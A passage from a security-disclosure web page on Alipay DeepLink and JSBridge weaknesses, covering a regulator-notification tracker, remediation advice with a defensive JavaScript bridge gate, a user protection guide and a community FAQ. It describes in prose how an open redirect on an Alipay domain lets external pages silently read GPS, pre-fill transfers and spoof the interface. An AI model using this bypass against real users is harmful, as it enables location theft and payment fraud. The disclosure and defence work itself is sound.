<td style="padding:8px 12px;">Assigned to Senior Officer at Retail Payment Oversight Division. SVF licensee complaint form submitted.</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">2</td>
<td style="padding:8px 12px;"><strong>PDPC (Personal Data Protection Commission)</strong></td>
<td style="padding:8px 12px;">🇸🇬 Singapore</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>Under Investigation</strong></td>
<td style="padding:8px 12px;">Formal investigation case opened.</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">3</td>
<td style="padding:8px 12px;"><strong>Apple Product Security</strong></td>
<td style="padding:8px 12px;">🇺🇸 USA</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>Forwarded to Investigation Team</strong></td>
<td style="padding:8px 12px;">Human response from Product Security confirming report forwarded to investigation team. Investigating high-risk JSBridge APIs exposed on Alipay iOS.</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">4</td>
<td style="padding:8px 12px;"><strong>Google Play</strong></td>
<td style="padding:8px 12px;">🇺🇸 USA</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>Policy Violation Investigation</strong></td>
<td style="padding:8px 12px;">"We will investigate and take appropriate action."</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">5</td>
<td style="padding:8px 12px;"><strong>MITRE CVE</strong></td>
<td style="padding:8px 12px;">🇺🇸 USA</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>36 CVEs Pending Assignment (11 tickets)</strong></td>
<td style="padding:8px 12px;">36 CVE requests submitted via CNA-LR pathway across 11 MITRE tickets. All receipts confirmed.</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">6</td>
<td style="padding:8px 12px;"><strong>CSSF (Luxembourg Financial Regulator)</strong></td>
<td style="padding:8px 12px;">🇱🇺 Luxembourg</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>Whistleblowing Case + ICT Risk Confirmed</strong></td>
<td style="padding:8px 12px;">4 departments/channels acknowledged (Whistleblowing case filed + ICT Risk Supervision confirmed ×2 + Reclamation confirmed). ICT Risk Supervision explicitly stated they "take note of the contents." Supplementary evidence submitted linking to 2025 AML penalty.</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">7</td>
<td style="padding:8px 12px;"><strong>Packet Storm Security</strong></td>
<td style="padding:8px 12px;">🇺🇸 USA</td>
<td style="padding:8px 12px; color: var(--green);"><strong>Published</strong></td>
<td style="padding:8px 12px;"><a href="https://packetstorm.news/files/id/217089" target="_blank">Advisory #217089</a></td>
</tr>
</tbody>
</table>
</div>
<h3 style="color: var(--yellow); margin-top: 24px;">II. Acknowledged & Transferred (11)</h3>
<div style="overflow-x: auto;">
<table style="width:100%; border-collapse:collapse; font-size:14px; margin:16px 0;">
<thead>
<tr style="background: var(--surface2); text-align:left;">
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">#</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">Organization</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">Country</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">Response</th>
</tr>
</thead>
<tbody>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">1</td><td style="padding:8px 12px;"><strong>CIRCL (National CERT Luxembourg)</strong></td><td style="padding:8px 12px;">🇱🇺</td><td style="padding:8px 12px;">Incident handler responded personally. <strong>Contacted Alibaba SRC on our behalf.</strong></td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">2</td><td style="padding:8px 12px;"><strong>ANSSI / CERT-FR</strong></td><td style="padding:8px 12px;">🇫🇷</td><td style="padding:8px 12px;">"Forwarded to the appropriate department."</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">3</td><td style="padding:8px 12px;"><strong>HKCERT</strong></td><td style="padding:8px 12px;">🇭🇰</td><td style="padding:8px 12px;"><strong>Forwarded to CNCERT</strong> (China's National CERT).</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">4</td><td style="padding:8px 12px;"><strong>FMA</strong></td><td style="padding:8px 12px;">🇳🇿</td><td style="padding:8px 12px;">"Considering whether to take further action."</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">5</td><td style="padding:8px 12px;"><strong>FCA</strong></td><td style="padding:8px 12px;">🇬🇧</td><td style="padding:8px 12px;">Whistleblowing team reviewing (AIUK Services Ltd, formerly Alipay UK Ltd).</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">6</td><td style="padding:8px 12px;"><strong>DNB</strong></td><td style="padding:8px 12px;">🇳🇱</td><td style="padding:8px 12px;">Cyber Defense Center acknowledged, routed to supervisory channel.</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">7</td><td style="padding:8px 12px;"><strong>OJK</strong></td><td style="padding:8px 12px;">🇮🇩</td><td style="padding:8px 12px;">Requested details. Full technical report provided.</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">8</td><td style="padding:8px 12px;"><strong>OAIC</strong></td><td style="padding:8px 12px;">🇦🇺</td><td style="padding:8px 12px;">Intake team confirmed receipt.</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">9</td><td style="padding:8px 12px;"><strong>EDPB</strong></td><td style="padding:8px 12px;">🇪🇺</td><td style="padding:8px 12px;">Acknowledged cross-border data protection complaint.</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">10</td><td style="padding:8px 12px;"><strong>ThaiCERT</strong></td><td style="padding:8px 12px;">🇹🇭</td><td style="padding:8px 12px;">"Forwarded to the responsible person."</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">11</td><td style="padding:8px 12px;"><strong>BNM</strong></td><td style="padding:8px 12px;">🇲🇾</td><td style="padding:8px 12px;">Ticket acknowledged.</td></tr>
</tbody>
</table>
</div>
<h3 style="color: var(--text2); margin-top: 24px;">III. Auto-Acknowledgments (8)</h3>
<p>BSP (Philippines), OSFI (Canada), Privacy International, ProPublica (USA), CNA/Mediacorp (Singapore), Datatilsynet (Denmark), DSB (Austria), IMY (Sweden).</p>
<h3 style="margin-top: 24px;">Overview</h3>
<div class="callout info">
<ul style="margin:0; padding-left: 20px;">
<li>Total sent: <strong>~189 emails</strong> across <strong>22 countries/regions</strong>, ~160 targets</li>
<li>Delivery rate: <strong>~90%</strong> (bounces corrected through 4 rounds)</li>
<li>Responses: <strong>39+</strong> (~23% response rate)</li>
<li><strong>7 formal investigations</strong>: HKMA, PDPC, Apple, Google, MITRE, CSSF, Packet Storm</li>
<li><strong>CIRCL</strong> proactively contacted Alibaba SRC on our behalf</li>
<li><strong>HKCERT → CNCERT</strong>: The only pathway to mainland China entities activated</li>
</ul>
</div>
<p style="margin-top:16px; color: var(--text2); font-size: 13px;"><em>Note: To protect ongoing investigations, certain case reference numbers and contact emails have been redacted. This table will be updated as investigations progress.</em></p>
</div>
<!-- ITIF Independent Corroboration -->
<div class="callout" style="border-color: var(--blue); background: rgba(68,136,255,.06); margin-top:20px;">
<h3 style="color:var(--blue);margin:0 0 10px 0;">
<span class="zh">Independent Corroboration: Parallel Assessment by a Leading US Tech Policy Think Tank</span>
<span class="en">Independent Corroboration: Parallel Assessment by Top US Tech Policy Think Tank</span>
</h3>
<div class="zh">
<p>On March 6, 2026, <strong>5 days before our public disclosure</strong>, the <a href="https://itif.org/publications/2026/03/06/alipay-presents-real-risks-but-dont-rush-to-ban-it/" target="_blank">Information Technology and Innovation Foundation (ITIF)</a> published the article <em>"Alipay Presents Real Risks — But Don't Rush to Ban It"</em>.</p>
<p>ITIF is rated by the University of Pennsylvania as the <strong>world's most authoritative science and technology policy think tank</strong>. The article independently notes that Alipay collects "purchase histories, device locations, government IDs, health data and biometric markers" and calls on the FTC and CFPB to audit Alipay's data practices. It also cites Article 7 of China's National Intelligence Law, noting that the Chinese government can lawfully require companies to hand over the data they collect.</p>
<p>This entirely independent assessment is highly consistent with our technical findings: <strong>when a whitelist bypass lets arbitrary attackers obtain Alipay users' GPS and device information, the data sovereignty risk is amplified further</strong>.</p>
</div>
<div class="en">
<p>On March 6, 2026 — <strong>5 days before our public disclosure</strong> — the <a href="https://itif.org/publications/2026/03/06/alipay-presents-real-risks-but-dont-rush-to-ban-it/" target="_blank">Information Technology & Innovation Foundation (ITIF)</a> published <em>"Alipay Presents Real Risks — But Don't Rush to Ban It."</em></p>
<p>ITIF is ranked by the University of Pennsylvania as the <strong>world's most authoritative science and technology policy think tank</strong>. The article independently identifies Alipay as collecting "purchase histories, device locations, government IDs, health data, and biometric markers," and calls for FTC and CFPB audits. It cites China's National Intelligence Law Article 7, noting the government can legally compel companies to share collected data.</p>
<p>This entirely independent assessment is highly consistent with our technical findings: <strong>when a whitelist bypass allows arbitrary attackers to obtain users' GPS and device information, data sovereignty risks are amplified further</strong>.</p>
</div>
</div>
</section>
<!-- ==================== 10. RECOMMENDATIONS ==================== -->
<section id="recommendations">
<h2><span class="num">10</span>
<span class="zh">Remediation Recommendations</span>
<span class="en">Remediation Recommendations</span>
</h2>
<div class="zh">
<p>Although the vendor classifies these as "normal features", we still offer the following technical recommendations for reference:</p>
</div>
<div class="en">
<p>Despite the vendor classifying these as "normal features," we still offer the following technical recommendations for consideration:</p>
</div>
<table>
<tr>
<th>#</th>
<th>
<span class="zh">Recommendation</span><span class="en">Recommendation</span>
</th>
<th>
<span class="zh">Addresses</span><span class="en">Addresses</span>
</th>
</tr>
<tr>
<td>1</td>
<td>
<span class="zh"><strong>JSBridge domain whitelist</strong>: non-Alibaba domains may not call <code>startApp</code>, <code>pushWindow</code>, <code>tradePay</code> or <code>getLocation</code></span>
<span class="en"><strong>JSBridge domain whitelist</strong>: Block <code>startApp</code>, <code>pushWindow</code>, <code>tradePay</code>, <code>getLocation</code> for non-Alibaba domains</span>
</td>
<td>V-01~V-07</td>
</tr>
<tr>
<td>2</td>
<td>
<span class="zh"><strong>startApp parameter filtering</strong>: when an external page calls <code>startApp</code>, passing <code>param</code> (pre-filled account/amount) is prohibited</span>
<span class="en"><strong>startApp parameter filtering</strong>: Block <code>param</code> passing (pre-fill account/amount) when called from external pages</span>
</td>
<td>V-01, V-02</td>
</tr>
<tr>
<td>3</td>
<td>
<span class="zh"><strong>pushWindow URL restriction</strong>: <code>pushWindow</code> may not load the <code>alipays://</code> scheme or internal URLs</span>
<span class="en"><strong>pushWindow URL restriction</strong>: Block <code>pushWindow</code> from loading <code>alipays://</code> schemes and internal URLs</span>
</td>
<td>V-02, V-03, V-12</td>
</tr>
<tr>
<td>4</td>
<td>
<span class="zh"><strong>tradePay source validation</strong>: <code>tradePay</code> must verify that the calling source is a trusted H5 app</span>
<span class="en"><strong>tradePay source validation</strong>: <code>tradePay</code> must verify calling source is a trusted H5 app</span>
</td>
<td>V-04</td>
</tr>
<tr>
<td>5</td>
<td>
<span class="zh"><strong>getLocation permission dialog</strong>: a user confirmation dialog must be shown when called from an external page</span>
<span class="en"><strong>getLocation permission dialog</strong>: Must show user consent dialog when called from external pages</span>
</td>
<td>V-07</td>
</tr>
<tr>
<td>6</td>
<td>
<span class="zh"><strong>DeepLink sensitive page protection</strong>: DeepLinks to sensitive functions need to verify the calling source or require a secondary confirmation</span>
<span class="en"><strong>DeepLink sensitive page protection</strong>: Sensitive function DeepLinks should verify calling source or require secondary confirmation</span>
</td>
<td>V-06, V-10, V-11</td>
</tr>
<tr>
<td>7</td>
<td>
<span class="zh"><strong>UI spoofing protection</strong>: external pages may not call <code>toast</code> or <code>setTitle</code></span>
<span class="en"><strong>UI spoofing protection</strong>: Block <code>toast</code>, <code>setTitle</code> from external pages</span>
</td>
<td>V-08</td>
</tr>
<tr>
<td>8</td>
<td>
<span class="zh"><strong>Enhanced "Continue to visit" warning</strong>: clearly inform users of the API permissions the external page will gain</span>
<span class="en"><strong>Enhanced "Continue" warning</strong>: Explicitly inform users of the API permissions the external page will gain</span>
</td>
<td>All</td>
</tr>
<tr>
<td>9</td>
<td>
<span class="zh"><strong>Data exfiltration prevention</strong>: check the target domain of XHR/Image requests made inside the WebView</span>
<span class="en"><strong>Data exfiltration prevention</strong>: Check target domain for XHR/Image requests within WebView</span>
</td>
<td>V-05, V-15~V-17</td>
</tr>
</table>
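<p>The table above lists the controls as requirements; the following is an added example (not Alipay's code and not from the original page) of how a hybrid app could enforce recommendations 1 to 9 as a single policy gate in front of its WebView JS bridge. The trusted domain suffixes, the registered H5 app list and the parameter names <code>param</code>, <code>url</code> and <code>callerAppId</code> are assumptions made for illustration; the API names are the ones named in the table.</p>

```javascript
// Added example, not Alipay's code: a policy gate in front of a WebView JS
// bridge, modelled on recommendations 1-9 above. Trusted suffixes, the H5 app
// registry and the parameter names `param`, `url`, `callerAppId` are assumptions.

const TRUSTED_SUFFIXES = ["alipay.com", "alibaba.com"];     // assumed first-party suffixes
const REGISTERED_H5_APPS = new Set(["2021000000000001"]);  // assumed registry of trusted H5 apps

// Rec. 1 and 7: bridge APIs an external (non-first-party) page may never call.
const DENY_EXTERNAL = new Set(["startApp", "pushWindow", "tradePay", "toast", "setTitle"]);
// Rec. 5: APIs an external page may call only after an explicit consent dialog.
const PROMPT_EXTERNAL = new Set(["getLocation"]);

function hostOf(urlString) {
  try { return new URL(urlString).hostname.toLowerCase(); } catch { return null; }
}

// Exact match or a real subdomain of a trusted suffix: "evil-alipay.com" and
// "alipay.com.attacker.example" both fail.
function isTrustedOrigin(origin) {
  const host = hostOf(origin);
  if (host === null) return false;
  return TRUSTED_SUFFIXES.some((s) => host === s || host.endsWith("." + s));
}

// Decide whether a bridge call from `origin` may proceed.
// Returns { action: "allow" | "deny" | "prompt", reason }.
function decideBridgeCall(origin, api, params = {}) {
  const trusted = isTrustedOrigin(origin);

  if (!trusted) {
    // Rec. 2: pre-filled transfer data from an external caller is rejected with
    // a specific reason, before the generic deny below.
    if (api === "startApp" && "param" in params) {
      return { action: "deny", reason: "startApp param pre-fill rejected for external origin" };
    }
    if (DENY_EXTERNAL.has(api)) {
      return { action: "deny", reason: `${api} is not exposed to external origins` };
    }
    if (PROMPT_EXTERNAL.has(api)) {
      return { action: "prompt", reason: `${api} requires user consent for external origins` };
    }
  }

  // Rec. 3 (applied to every caller as defence in depth, an assumption):
  // pushWindow may only open https:// pages, never alipays:// or other schemes.
  if (api === "pushWindow") {
    let scheme = null;
    try { scheme = new URL(String(params.url)).protocol; } catch { /* unparsable URL */ }
    if (scheme !== "https:") {
      return { action: "deny", reason: "pushWindow target must be an https:// URL" };
    }
  }

  // Rec. 4: tradePay must come from a registered H5 app. callerAppId is assumed
  // to be attached by the host app itself, never supplied by page script.
  if (api === "tradePay" && !REGISTERED_H5_APPS.has(params.callerAppId)) {
    return { action: "deny", reason: "tradePay caller is not a registered H5 app" };
  }

  return { action: "allow", reason: trusted ? "first-party origin" : "API is safe for external origins" };
}

// Rec. 9: an external page inside the privileged WebView may only send XHR /
// Image requests back to its own host (assumed policy); first-party pages are
// left to the app's existing controls.
function allowOutboundRequest(pageOrigin, targetUrl) {
  const pageHost = hostOf(pageOrigin);
  const targetHost = hostOf(targetUrl);
  if (pageHost === null || targetHost === null) return false;
  if (isTrustedOrigin(pageOrigin)) return true;
  return targetHost === pageHost;
}

// Rec. 8: what the "Continue to visit" dialog should list, so the user knows
// which bridge APIs the external page will be able to use and which need consent.
function describeExternalGrant(bridgeApis) {
  return bridgeApis
    .filter((api) => !DENY_EXTERNAL.has(api))
    .map((api) => ({ api, consent: PROMPT_EXTERNAL.has(api) }));
}
```

<p>The gate is deliberately origin-first: an external page is classified once, and every later check only narrows what it may do. Recommendation 6 (DeepLink source verification) sits outside the bridge, in the scheme handler, and is not modelled here.</p>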
</section>
<!-- ==================== USER DEFENSE GUIDE ==================== -->
<section id="user-defense">
<h2><span class="num">🛡️</span>
<span class="zh">User Self-Protection Guide</span>
<span class="en">User Self-Protection Guide</span>
</h2>
<div class="zh">
<p>Until the vendor fixes these issues, ordinary users can take the following measures to reduce risk:</p>
</div>
<div class="en">
<p>Until the vendor addresses these issues, ordinary users can take the following steps to reduce risk:</p>
</div>
<table>
<tr>
<th>#</th>
<th><span class="zh">Measure</span><span class="en">Measure</span></th>
<th><span class="zh">Description</span><span class="en">Description</span></th>
<th><span class="zh">Coverage</span><span class="en">Coverage</span></th>
</tr>
<tr>
<td>1</td>
<td><span class="zh"><strong>Don't click unknown links</strong></span><span class="en"><strong>Don't click unknown links</strong></span></td>
<td><span class="zh">Be wary of links containing <code>ds.alipay.com</code> or <code>alipays://</code>, especially links arriving via group chats, SMS or email</span><span class="en">Be cautious with links containing <code>ds.alipay.com</code> or <code>alipays://</code>, especially from group chats, SMS, or emails</span></td>
<td><span class="zh">All vulnerabilities</span><span class="en">All vulnerabilities</span></td>
</tr>
<tr>
<td>2</td>
<td><span class="zh"><strong>Disable location permission</strong></span><span class="en"><strong>Disable location permission</strong></span></td>
<td><span class="zh">In system settings, set Alipay's location permission to "While Using" or "Off", and enable it temporarily when needed</span><span class="en">In system settings, change Alipay's location permission to "While Using" or "Off"; enable temporarily when needed</span></td>
<td><span class="zh">Silent GPS exfiltration</span><span class="en">Silent GPS exfiltration</span></td>
</tr>
<tr>
<td>3</td>
<td><span class="zh"><strong>Verify transfer details</strong></span><span class="en"><strong>Verify transfer details</strong></span></td>
<td><span class="zh">For any transfer/payment page that pops up, carefully check the recipient details; don't confirm just because the page "looks normal"</span><span class="en">For any transfer/payment page that appears, carefully verify recipient information — don't confirm just because the page "looks normal"</span></td>
<td><span class="zh">Transfer pre-fill attack</span><span class="en">Transfer pre-fill attack</span></td>
</tr>
<tr>
<td>4</td>
<td><span class="zh"><strong>Disable small-amount password-free payment</strong></span><span class="en"><strong>Disable small-amount password-free payments</strong></span></td>
<td><span class="zh">Settings → Payment Settings → Password-free Payment → disable small-amount password-free payment. Make sure every payment requires password/fingerprint confirmation</span><span class="en">Settings → Payment Settings → Password-free Payment → Disable. Ensure every payment requires password/biometric confirmation</span></td>
<td><span class="zh">Payment interface invocation</span><span class="en">Payment interface invocation</span></td>
</tr>
<tr>
<td>5</td>
<td><span class="zh"><strong>Keep the app updated</strong></span><span class="en"><strong>Keep app updated</strong></span></td>
<td><span class="zh">If the vendor has quietly fixed some of the issues (community feedback indicates some interfaces have changed), updating to the latest version provides protection</span><span class="en">If the vendor silently patches issues (community feedback suggests some APIs have changed), updating to the latest version provides protection</span></td>
<td><span class="zh">Patched interfaces</span><span class="en">Patched interfaces</span></td>
</tr>
</table>
</section>
<!-- ==================== COMMUNITY FAQ ==================== -->
<section id="community-faq">
<h2><span class="num">💬</span>
<span class="zh">Community Questions and Responses</span>
<span class="en">Community Questions & Responses</span>
</h2>
<div class="zh">
<p>This research has prompted professional discussion on <a href="https://github.com/sgInnora/alipay-deeplink-research/issues/4" target="_blank">GitHub</a>, <a href="https://www.v2ex.com/t/1198033" target="_blank">V2EX</a>, <a href="https://linux.do/t/topic/1746089" target="_blank">LINUX DO</a> and other platforms. We thank all security practitioners who took part in the technical discussion and respond to the main questions one by one here.</p>
</div>
<div class="en">
<p>This research has sparked professional discussions on <a href="https://github.com/sgInnora/alipay-deeplink-research/issues/4" target="_blank">GitHub</a>, <a href="https://www.v2ex.com/t/1198033" target="_blank">V2EX</a>, <a href="https://linux.do/t/topic/1746089" target="_blank">LINUX DO</a> and other platforms. We thank all security professionals who participated in the technical discussion and address the main questions below.</p>
</div>
<!-- Q1: DeepLink是正常设计 -->
<div style="background:rgba(255,255,255,.04);border:1px solid rgba(255,255,255,.1);border-radius:10px;padding:20px 24px;margin:16px 0;">
<h3 style="color:#ff8800;margin:0 0 12px 0;">
<span class="zh">Q1: "DeepLink / URL Scheme is a normal design, not a vulnerability"</span>
<span class="en">Q1: "DeepLink / URL Scheme is normal design, not a vulnerability"</span>
</h3>
<div class="zh">
<p style="color:#9898a8;font-style:italic;margin:0 0 12px 0;">Source: GitHub Issue #4 (sevck), V2EX (Puteulanus)</p>
<p><strong style="color:#4ecdc4;">We agree:</strong> the DeepLink mechanism itself is a common design across the mobile ecosystem. We have never defined "the existence of DeepLink" as a vulnerability.</p>
<p><strong style="color:#ff4444;">But the core issue is:</strong> the <strong>open redirect</strong> on Alipay's own domain <code>ds.alipay.com</code> allows <strong>anyone</strong> to load <strong>an arbitrary external page</strong> into Alipay's privileged WebView via the whitelisted domain and gain full JSBridge API access. This is not a matter of "DeepLink existing"; it is the <strong>security boundary being completely breached</strong>.</p>
<ul>
<li><a href="https://cwe.mitre.org/data/definitions/601.html" target="_blank">CWE-601 (URL Redirection to Untrusted Site)</a> is a vulnerability type explicitly recognised in the OWASP Top 10</li>
<li><a href="https://cwe.mitre.org/data/definitions/939.html" target="_blank">CWE-939 (Improper Authorization in Handler for Custom URL Scheme)</a> is also a standard vulnerability classification</li>
<li>The <a href="https://developer.android.com/privacy-and-security/risks/unsafe-use-of-deeplinks" target="_blank">Google Android security documentation</a> explicitly lists unsafe use of Deep Links as a security risk</li>
</ul>
<p>An analogy: a door lock is a normal design. But if anyone can open your door lock with a slip of paper, that is a security flaw in the lock, not a case of "this kind of lock design doesn't count as a vulnerability".</p>
</div>
<div class="en">
<p style="color:#9898a8;font-style:italic;margin:0 0 12px 0;">Source: GitHub Issue #4 (sevck), V2EX (Puteulanus)</p>
<p><strong style="color:#4ecdc4;">We agree:</strong> DeepLink is a standard mechanism in the mobile ecosystem. We never defined "the existence of DeepLink" as a vulnerability.</p>
<p><strong style="color:#ff4444;">But the core issue is:</strong> Alipay's own domain <code>ds.alipay.com</code> has an <strong>open redirect</strong> that allows <strong>anyone</strong> to load <strong>arbitrary external pages</strong> into Alipay's privileged WebView via the whitelisted domain, gaining full JSBridge API access. This is not about "DeepLink existing" — it is about the <strong>security boundary being completely breached</strong>.</p>
<ul>
<li><a href="https://cwe.mitre.org/data/definitions/601.html" target="_blank">CWE-601 (URL Redirection to Untrusted Site)</a> is explicitly classified as a vulnerability in OWASP Top 10</li>
<li><a href="https://cwe.mitre.org/data/definitions/939.html" target="_blank">CWE-939 (Improper Authorization in Handler for Custom URL Scheme)</a> is a standard vulnerability classification</li>
<li><a href="https://developer.android.com/privacy-and-security/risks/unsafe-use-of-deeplinks" target="_blank">Google Android Security docs</a> explicitly list unsafe use of Deep Links as a security risk</li>
</ul>
<p>Analogy: A door lock is a normal design. But if anyone can open your door lock with a slip of paper, that's a vulnerability in the lock — not "door locks aren't vulnerabilities."</p>
</div>
</div>
<!-- Q2: GPS已有权限 -->
<div style="background:rgba(255,255,255,.04);border:1px solid rgba(255,255,255,.1);border-radius:10px;padding:20px 24px;margin:16px 0;">
<h3 style="color:#ff8800;margin:0 0 12px 0;">
<span class="zh">Q2: "Obtaining GPS under a permission the user has already granted is normal behaviour"</span>
<span class="en">Q2: "GPS access under existing user permissions is normal behavior"</span>
</h3>
<div class="zh">
<p style="color:#9898a8;font-style:italic;margin:0 0 12px 0;">Source: GitHub Issue #4 (sevck, rama2910****10)</p>
<p><strong>This is a question of permission delegation versus permission abuse.</strong></p>
<table style="margin:12px 0;">
<tr><th>Scenario</th><th>User expectation</th><th>Actual behaviour</th></tr>
<tr><td>User grants Alipay GPS permission</td><td>Used by Alipay's own functions</td><td style="color:#4ecdc4;">✅ Normal</td></tr>
<tr><td>External attacker obtains GPS via WebView</td><td>Not within the user's expectation</td><td style="color:#ff4444;">❌ Permission abuse</td></tr>
<tr><td>Standard browser requests the user's location</td><td>A dialog asks for confirmation</td><td style="color:#4ecdc4;">✅ W3C standard behaviour</td></tr>
<tr><td>External page in Alipay WebView requests location</td><td>Should show a confirmation dialog</td><td style="color:#ff4444;">❌ No dialog, silent access</td></tr>
</table>
<p>As nailchu pointed out in the discussion: <em>"I granted the permission to you, Alipay; what kind of arrangement is it that an attacker can just take it whenever they want? Even a browser pops up 'this website is requesting your location'."</em></p>
<p>When a user grants location permission to Alipay, they are trusting <strong>Alipay</strong>, not any random webpage that can be loaded into Alipay's WebView. When an attacker's page can enter the WebView via the whitelist bypass and silently call <code>getLocation</code>, that is an abuse of the user's trust.</p>
<p><strong>Test evidence</strong>: 308 server log entries record GPS coordinates silently obtained from 3 real devices (8.8 m accuracy), completed within 7 seconds with 0 user interactions. freshnn on GitHub Issue #5 also independently confirmed that "silent GPS" succeeds on Android.</p>
</div>
<div class="en">
<p style="color:#9898a8;font-style:italic;margin:0 0 12px 0;">Source: GitHub Issue #4 (sevck, rama2910****10)</p>
<p><strong>This is a question of permission delegation vs. permission abuse.</strong></p>
<table style="margin:12px 0;">
<tr><th>Scenario</th><th>User Expectation</th><th>Actual Behavior</th></tr>
<tr><td>User grants Alipay GPS permission</td><td>Used by Alipay's own functions</td><td style="color:#4ecdc4;">✅ Normal</td></tr>
<tr><td>External attacker accesses GPS via WebView</td><td>Not within user's expectation</td><td style="color:#ff4444;">❌ Permission abuse</td></tr>
<tr><td>Standard browser requests location</td><td>Shows confirmation dialog</td><td style="color:#4ecdc4;">✅ W3C standard</td></tr>
<tr><td>External page in Alipay WebView requests location</td><td>Should show dialog</td><td style="color:#ff4444;">❌ No dialog, silent access</td></tr>
</table>
<p>As nailchu pointed out in the discussion: <em>"I authorized Alipay, not any attacker who wants my location. Even browsers show 'This website is requesting your location.'"</em></p>
<p>When users grant location permission to Alipay, they trust <strong>Alipay</strong> — not any random webpage that can be loaded into Alipay's WebView. When an attacker's page enters the WebView via whitelist bypass and silently calls <code>getLocation</code>, this is an abuse of user trust.</p>
<p><strong>Evidence</strong>: 308 server log entries documenting GPS coordinates silently obtained from 3 real devices (8.8m accuracy), completed in 7 seconds, with 0 user interactions. freshnn on GitHub Issue #5 also independently confirmed "silent GPS" works on Android.</p>
</div>
</div>
<!-- Q3: Transfer pre-fill requires confirmation -->
<div style="background:rgba(255,255,255,.04);border:1px solid rgba(255,255,255,.1);border-radius:10px;padding:20px 24px;margin:16px 0;">
<h3 style="color:#ff8800;margin:0 0 12px 0;">
<span class="zh">Q3: "Transfer pre-fill requires user confirmation, similar to Chrome form auto-fill"</span>
<span class="en">Q3: "Transfer pre-fill requires user confirmation, similar to Chrome form auto-fill"</span>
</h3>
<div class="zh">
<p style="color:#9898a8;font-style:italic;margin:0 0 12px 0;">Source: GitHub Issue #4 (sevck, rama2910****10)</p>
<p><strong style="color:#4ecdc4;">We partially agree:</strong> a transfer does require at least 2 user taps plus password/biometric confirmation and cannot complete automatically. This precondition is already stated explicitly in the relevant sections of this report.</p>
<p><strong style="color:#ff8800;">But the Chrome analogy is inaccurate:</strong></p>
<ul>
<li>Chrome pre-fills form data <strong>the user saved themselves</strong>; an attacker cannot choose what gets pre-filled</li>
<li>In Alipay's pre-fill, the recipient account and amount are <strong>specified by the attacker through URL parameters</strong>; this is fundamentally different in nature</li>
<li>Combined with UI spoofing capabilities (<code>setTitle</code>/<code>showToast</code>), an attacker can fabricate a legitimate-looking reason for the transfer and lower the user's guard</li>
</ul>
<p><a href="https://github.com/sgInnora/alipay-deeplink-research/issues/4" target="_blank">cxxsheng</a>, who took part in the discussion, independently wrote a PoC and concluded: <em>"I still consider this feature a vulnerability, but the severity is lower."</em> He also cited <a href="https://github.com/advisories/GHSA-88q7-6vxh-w5q7" target="_blank">CVE-2024-40676</a> (an Android precedent): reducing the number of user interaction steps can itself constitute a vulnerability.</p>
</div>
<div class="en">
<p style="color:#9898a8;font-style:italic;margin:0 0 12px 0;">Source: GitHub Issue #4 (sevck, rama2910****10)</p>
<p><strong style="color:#4ecdc4;">We partially agree:</strong> Transfers indeed require at least 2 clicks + password/biometric confirmation and cannot complete automatically. This precondition is already explicitly stated in the relevant sections of this report.</p>
<p><strong style="color:#ff8800;">But the Chrome analogy is inaccurate:</strong></p>
<ul>
<li>Chrome auto-fills data <strong>previously saved by the user</strong> — attackers cannot specify the pre-filled content</li>
<li>Alipay's pre-fill is <strong>specified by the attacker via URL parameters</strong> for recipient account and amount — fundamentally different</li>
<li>Combined with UI spoofing (<code>setTitle</code>/<code>showToast</code>), attackers can fabricate legitimate-looking transfer reasons, reducing user vigilance</li>
</ul>
<p><a href="https://github.com/sgInnora/alipay-deeplink-research/issues/4" target="_blank">cxxsheng</a> independently wrote a PoC and concluded: <em>"I still consider this a vulnerability, but with lower severity."</em> He also cited <a href="https://github.com/advisories/GHSA-88q7-6vxh-w5q7" target="_blank">CVE-2024-40676</a> (Android precedent): reducing user interaction steps itself can constitute a vulnerability.</p>
</div>
</div>
<!-- Q4: iOS reproduction failure -->
<div style="background:rgba(255,255,255,.04);border:1px solid rgba(255,255,255,.1);border-radius:10px;padding:20px 24px;margin:16px 0;">
<h3 style="color:#ff8800;margin:0 0 12px 0;">
<span class="zh">Q4: "Cannot reproduce data exfiltration on iOS"</span>
<span class="en">Q4: "Cannot reproduce data exfiltration on iOS"</span>
</h3>
<div class="zh">
<p style="color:#9898a8;font-style:italic;margin:0 0 12px 0;">Source: GitHub Issue #5 (freshnn)</p>
<p>freshnn reported that on iOS the relevant pages can be invoked and opened, but the server receives no data; on Android, "silent GPS" was reproduced successfully.</p>
<p><strong>Possible causes:</strong></p>
<ul>
<li><strong>HTTPS mixed-content blocking</strong>: if the PoC page is loaded in Alipay's HTTPS WebView while the exfiltration target is HTTP, WKWebView blocks the request outright (note: this blocks the request itself, not just the response)</li>
<li><strong>CSP connect-src restriction</strong>: Alipay's WebView may set a CSP <code>connect-src</code> directive that blocks requests to external domains</li>
